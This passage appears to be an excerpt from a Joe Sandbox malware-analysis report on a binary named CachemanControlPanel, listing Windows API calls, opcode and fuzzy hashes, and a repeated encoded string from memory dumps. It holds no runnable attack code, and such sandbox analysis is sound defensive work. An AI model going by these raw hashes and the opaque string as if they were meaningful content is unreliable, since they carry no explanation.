                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocateFileHeapModuleNameValuememmovewcscmp
                                                        • String ID: \\?\
                                                        • API String ID: 2309408642-4282027825
                                                        • Opcode ID: a81e059373165dd1a03f766b15f40a16fe89045bfcc344d124597f16493a74d5
                                                        • Instruction ID: 8c3411c3b14226c7e4b263ad9ce69aedf44cf3b3a7cec09574a5718fa21f4c5b
                                                        • Opcode Fuzzy Hash: a81e059373165dd1a03f766b15f40a16fe89045bfcc344d124597f16493a74d5
                                                        • Instruction Fuzzy Hash: 87F0E2B31003013AC20077769C89C6B7AACEB95374B50023FF515D2590EA29D82482B9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • HeapAlloc.KERNEL32(00000008,00000450,?,?,?,?,?,?), ref: 00414704
                                                        • HeapAlloc.KERNEL32(00000000,?), ref: 00414767
                                                        • memcpy.MSVCRT ref: 004147D2
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 004147FA
                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0041488E
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$Alloc$Freememcpy
                                                        • String ID:
                                                        • API String ID: 2973548000-0
                                                        • Opcode ID: 21604710463d8e599cdd61330dda8d1fa7ab9989177b0e0bb27bda841b6fa119
                                                        • Instruction ID: acc546f1e3a6ca03d6c5b43bdacddd43cfe1f47c8e07581174647a9f369c0157
                                                        • Opcode Fuzzy Hash: 21604710463d8e599cdd61330dda8d1fa7ab9989177b0e0bb27bda841b6fa119
                                                        • Instruction Fuzzy Hash: 4951DF746047419FD324EF28C880A67BBF4FF89354F044A2EF495963A1D374E985CB5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00418710: TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418727
                                                        • RegOpenKeyExW.ADVAPI32(00000000,00001000,00000000,00001000,00001000,00001000,00000001,00000000,00000000,00001000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00402068
                                                        • RegCloseKey.ADVAPI32(00000000,00000000,00001000,00000000,00001000,00001000,00001000,00000001,00000000,00000000,00001000,00000001,00000000,00000000,00000000,00000000), ref: 00402083
                                                        • RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000000,00001000), ref: 004020C7
                                                        • RegCloseKey.ADVAPI32(00001000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00001000,00000000), ref: 004020D4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Close$InfoOpenQueryValue
                                                        • String ID:
                                                        • API String ID: 4130832526-0
                                                        • Opcode ID: 45a50ca21baa18b3d345847b8b8faf07d46b323eb7ebbf446c159730ffe67bca
                                                        • Instruction ID: 0e9d086506c378460acc155e1f51a85814b58dfa23dc9ad1d8aba89365207148
                                                        • Opcode Fuzzy Hash: 45a50ca21baa18b3d345847b8b8faf07d46b323eb7ebbf446c159730ffe67bca
                                                        • Instruction Fuzzy Hash: EC412974108300BEE6117B61CD4AA7F76AAEBC4718F10C93FB184661E2DA7D8C91D62E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 0040497F
                                                          • Part of subcall function 004187A0: HeapFree.KERNEL32(02A80000,00000000,00000000,?,00000000,?,0041FFFD,00000000,00000000,00000000), ref: 004187B8
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00404914
                                                        • @C, xrefs: 00404A97
                                                        • PC, xrefs: 00404AA9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: FreeHeapInitialize
                                                        • String ID: @C$Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY$PC
                                                        • API String ID: 166756831-1029251199
                                                        • Opcode ID: deaa994a7fcb4ae4cab6a9f968cd89247e86013451127cbc1fa5669bb2610999
                                                        • Instruction ID: 19cc3a0f44592c03131b753eaa9dc6896efcedf454b515a6778ad9df84cffc17
                                                        • Opcode Fuzzy Hash: deaa994a7fcb4ae4cab6a9f968cd89247e86013451127cbc1fa5669bb2610999
                                                        • Instruction Fuzzy Hash: 2F5108B1108201AFD700EF64D885E0BBBE8AF88314F14493DF599E7261DB39E9598B57
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetObjectType.GDI32(00000000), ref: 00421188
                                                        • GetObjectW.GDI32(00000000,00000054,?), ref: 0042119E
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 0042120D
                                                        • DeleteObject.GDI32(00000000), ref: 00421250
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Object$DeleteType
                                                        • String ID:
                                                        • API String ID: 1880294369-0
                                                        • Opcode ID: 61ea1224b2f9a32b6189e9ed9a660db11ad70cc2f0fa5ef4d5a8c547dafb258f
                                                        • Instruction ID: 1218b1f38ce59c05a6364bd0815929ebd11134acd2d9f38e5a34235b1284056a
                                                        • Opcode Fuzzy Hash: 61ea1224b2f9a32b6189e9ed9a660db11ad70cc2f0fa5ef4d5a8c547dafb258f
                                                        • Instruction Fuzzy Hash: BA218E31A01539FBCF229E90AC40DEF3B69AF29354F840246FA05B11A0C739CD619BE9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004121CE
                                                        • memset.MSVCRT ref: 004121E1
                                                        • CreateDIBSection.GDI32(00000000,00000028,00000000,00000000,00000000,00000000), ref: 00412221
                                                        • DeleteDC.GDI32(00000000), ref: 0041222A
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Create$CompatibleDeleteSectionmemset
                                                        • String ID:
                                                        • API String ID: 2003947935-0
                                                        • Opcode ID: 42f5d1143b386d35c0d67154a89b1cb09a904d8fa7a10b69d25e21b3a1398081
                                                        • Instruction ID: b9058a125b476e0bd9b5174dfe032ff59b179c194d773674dfcba8743e997c6f
                                                        • Opcode Fuzzy Hash: 42f5d1143b386d35c0d67154a89b1cb09a904d8fa7a10b69d25e21b3a1398081
                                                        • Instruction Fuzzy Hash: B6014075911228ABCB10DFA9ED09DDEB7BCEF49710F00401AF904E3250E6B4991487A9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 004182C1: EnterCriticalSection.KERNEL32(00434134,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,00000000,0041244B,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?,00000000,?,00406FC1,?), ref: 004182D5
                                                          • Part of subcall function 004182C1: HeapFree.KERNEL32(00000000,?,?,00411D21,?,00000000,?,00406FC1,?,00000000,00000000,00000000,?,FFFFFFFF,?,?), ref: 00418323
                                                          • Part of subcall function 004182C1: LeaveCriticalSection.KERNEL32(00434134,?,00411D21,?,00000000,?,00406FC1,?,00000000,00000000,00000000,?,FFFFFFFF,?,?,00000000), ref: 0041832A
                                                        • HeapFree.KERNEL32(00000000,?,00000000,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?,00000000,?,00406FC1,?,00000000,00000000), ref: 00412470
                                                        • HeapFree.KERNEL32(00000000,?,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?,00000000,?,00406FC1,?,00000000,00000000,00000000), ref: 00412489
                                                        • HeapFree.KERNEL32(00000000,00000000,?,00000000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,?,00411D21,?,00000000,?,00406FC1,?,00000000,00000000,00000000), ref: 00412493
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 0041243C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: FreeHeap$CriticalSection$EnterLeave
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 177673914-3176450862
                                                        • Opcode ID: 5e96d49670aed5afeab2948676332a60579a7723a950df61f7429b34146f08ba
                                                        • Instruction ID: c23c06232ff69018985a420cdf63478be6713de22b319fbc30e07c1c694b4078
                                                        • Opcode Fuzzy Hash: 5e96d49670aed5afeab2948676332a60579a7723a950df61f7429b34146f08ba
                                                        • Instruction Fuzzy Hash: 40011D31100605BFD616AF19DE80D67BBF8FB49754705452AB40493620C776FCA1DAA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: floor$ceil
                                                        • String ID:
                                                        • API String ID: 336488799-0
                                                        • Opcode ID: 37631b848a6609e4ebe49b527d1d80fd1d2e7e0d54e8e1d4e55d37267a0c9bfd
                                                        • Instruction ID: f85e8895866d771c11a413de973f46c973506992b1b38ec38b8edf60660cc283
                                                        • Opcode Fuzzy Hash: 37631b848a6609e4ebe49b527d1d80fd1d2e7e0d54e8e1d4e55d37267a0c9bfd
                                                        • Instruction Fuzzy Hash: D301E834908605EFCA107B10F84911EFFA0FF90724F95C8A9E4D821196DA35847CCB5F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,0040AD9C,?), ref: 0040ABC3
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,0040AD9C,?), ref: 0040ABCF
                                                        • DuplicateHandle.KERNEL32(00000000,?,?,0040AD9C,?), ref: 0040ABD6
                                                        • CloseHandle.KERNEL32(?,?,?,0040AD9C,?), ref: 0040ABE2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CurrentHandleProcess$CloseDuplicate
                                                        • String ID:
                                                        • API String ID: 1410216518-0
                                                        • Opcode ID: 33c99e83e0009c6bcef4029bcc3ec2362cf96975f7eab3cffe9dcd820fa688a0
                                                        • Instruction ID: 078a8b30389f9945110c720821267111a19b36a3759753f42c70faf59451e87b
                                                        • Opcode Fuzzy Hash: 33c99e83e0009c6bcef4029bcc3ec2362cf96975f7eab3cffe9dcd820fa688a0
                                                        • Instruction Fuzzy Hash: B3E06D35200209BFEB14AF95DD09F5ABBBCEF04710F100124F900D6260DBB1A910CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418727
                                                          • Part of subcall function 0042044E: TlsAlloc.KERNEL32(?,?,00418768,004186D0,00000000), ref: 0042045E
                                                          • Part of subcall function 0042044E: InitializeCriticalSection.KERNEL32(00434170,?,?,00418768,004186D0,00000000), ref: 0042046A
                                                          • Part of subcall function 0042044E: TlsGetValue.KERNEL32(?,?,00418768,004186D0,00000000), ref: 00420480
                                                          • Part of subcall function 0042044E: HeapAlloc.KERNEL32(00000008,00000014,?,?,00418768,004186D0,00000000), ref: 0042049A
                                                          • Part of subcall function 0042044E: EnterCriticalSection.KERNEL32(00434170,?,?,00418768,004186D0,00000000), ref: 004204AB
                                                          • Part of subcall function 0042044E: LeaveCriticalSection.KERNEL32(00434170,?,?,?,00418768,004186D0,00000000), ref: 004204C7
                                                          • Part of subcall function 0042044E: GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,00418768,004186D0,00000000), ref: 004204E0
                                                          • Part of subcall function 0042044E: GetCurrentThread.KERNEL32 ref: 004204E3
                                                          • Part of subcall function 0042044E: GetCurrentProcess.KERNEL32(00000000,?,?,?,00418768,004186D0,00000000), ref: 004204EA
                                                          • Part of subcall function 0042044E: DuplicateHandle.KERNEL32(00000000,?,?,?,00418768,004186D0,00000000), ref: 004204ED
                                                          • Part of subcall function 0042044E: RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,00420546,00000000,000000FF,00000008), ref: 00420503
                                                          • Part of subcall function 0042044E: TlsSetValue.KERNEL32(00000000,?,?,?,00418768,004186D0,00000000), ref: 00420510
                                                          • Part of subcall function 0042044E: HeapAlloc.KERNEL32(00000000,0000000C,?,?,00418768,004186D0,00000000), ref: 00420521
                                                        • TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418741
                                                        • TlsGetValue.KERNEL32(00000022), ref: 00418757
                                                          • Part of subcall function 00418520: HeapCreate.KERNEL32(00000000,00001000,00000000,?,0040104E,00000000,00001000,00000000,00000000), ref: 0041852C
                                                          • Part of subcall function 00418520: TlsAlloc.KERNEL32(?,0040104E,00000000,00001000,00000000,00000000), ref: 00418537
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00418710
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
